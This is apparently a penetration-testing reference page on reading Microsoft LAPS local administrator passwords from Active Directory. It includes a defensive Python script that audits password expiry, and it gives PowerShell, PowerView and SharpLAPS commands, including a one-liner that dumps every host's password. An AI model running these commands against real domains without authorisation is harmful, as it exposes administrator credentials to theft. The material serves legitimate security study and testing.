ReadLAPSPassword

Microsoft Local Administrator Password Solution (LAPS) is a Windows security feature designed to manage and protect local administrator credentials on domain-joined systems. It automatically generates strong, random passwords for local administrator accounts and rotates them regularly, with a default rotation period of 30 days.

Each managed device runs a LAPS client that periodically updates the local administrator password. After the password is changed, it is securely stored in Active Directory as an attribute of the corresponding computer object. In the legacy implementation, this attribute is called ms-MCS-AdmPwd.

Administrators can retrieve the current password using the LAPS management interface or PowerShell. Access to this information is strictly controlled: only users or groups with explicit permission to read the attribute are able to view the stored password.

An attacker can access the ms-MCS-AdmPwd attribute if they compromise an account that directly has this permission or has either GenericAll or AllExtendedRights rights over a target computer configured with LAPS.
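Because ms-Mcs-AdmPwdExpirationTime is stored next to the password on the computer object, the same LDAP data lets a defender audit rotation health. The Python script below is an added example, not code from the original page or from any LAPS tool: it decodes the attribute's Windows FILETIME encoding (100-nanosecond ticks since 1601-01-01 UTC) and flags hosts whose password has expired, was never set, or whose expiry lies beyond the 30-day policy maximum, a value the LAPS client itself never writes. The computer names, timestamps and the attribute-dictionary layout are constructed for the example; the attribute name and the FILETIME epoch are real.

```python
from datetime import datetime, timedelta, timezone

# Active Directory stores ms-Mcs-AdmPwdExpirationTime as a Windows FILETIME:
# the number of 100-nanosecond ticks since 1601-01-01 00:00:00 UTC.
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a FILETIME tick count to a timezone-aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Convert a timezone-aware datetime back to FILETIME ticks (integer math, no float drift)."""
    delta = dt - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def audit_laps_expiry(computers: dict, now: datetime, max_age_days: int = 30) -> dict:
    """Classify each computer by the state of its LAPS expiration timestamp.

    `computers` maps a computer name to a dict of LDAP attributes stored as
    strings, the way ldap3 or ldapsearch return them (layout is constructed here).
    Returned states:
      not-managed   - attribute absent: LAPS has never set a password on this host
      expired       - expiry is in the past, so the client has failed to rotate
      beyond-policy - expiry lies further out than the configured maximum age,
                      which the LAPS client never sets and which merits investigation
      ok            - expiry falls inside the policy window
    """
    findings = {}
    for name, attrs in computers.items():
        raw = attrs.get("ms-Mcs-AdmPwdExpirationTime")
        if raw is None or raw == "":
            findings[name] = "not-managed"
            continue
        expires = filetime_to_datetime(int(raw))
        if expires <= now:
            findings[name] = "expired"
        elif expires > now + timedelta(days=max_age_days):
            findings[name] = "beyond-policy"
        else:
            findings[name] = "ok"
    return findings


# Constructed sample data: a fixed "now" and four hypothetical computer objects.
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_COMPUTERS = {
    "WS01": {"ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW + timedelta(days=12)))},
    "WS02": {"ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW - timedelta(days=3)))},
    "SRV01": {"ms-Mcs-AdmPwdExpirationTime": str(datetime_to_filetime(NOW + timedelta(days=400)))},
    "LEGACY01": {},
}

if __name__ == "__main__":
    for host, state in audit_laps_expiry(SAMPLE_COMPUTERS, NOW).items():
        print(f"{host:10} {state}")
```

In a real audit the dictionary would be filled from an LDAP search for objects with ms-Mcs-AdmPwdExpirationTime set, run as an account that can read the expiration attribute but not the password itself; the password attribute is never needed for this check.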

Windows

The LAPS password can be read using the PowerShell cmdlets, PowerView, or SharpLAPS.

```powershell
# Active Directory PowerShell module
# -Identity and -Filter belong to different parameter sets and cannot be combined;
# to list every LAPS-managed host instead, replace -Identity DC01 with
# -Filter {ms-Mcs-AdmPwdExpirationTime -like '*'}
Get-ADComputer -Identity DC01 -Properties 'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime'

# PowerView
Get-DomainComputer "DC01" -Properties 'cn','ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# SharpLAPS
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"

# Enumerate all LAPS-enabled hosts (PowerView); statements inside the script block are separated by semicolons
Get-DomainComputer -Properties name | ForEach-Object { $computer = $_.name; $obj = Get-DomainObject -Identity $computer -Properties 'ms-mcs-AdmPwd',name -ErrorAction SilentlyContinue; if ($obj.'ms-mcs-AdmPwd') { Write-Output "$computer`: $($obj.'ms-mcs-AdmPwd')" } }
```

Linux

The LAPS password can be read from a Linux host via NetExec, BloodyAD, pyLAPS, or LAPSDumper.

For an example of reading the LAPS password with NetExec, see Timelapse.
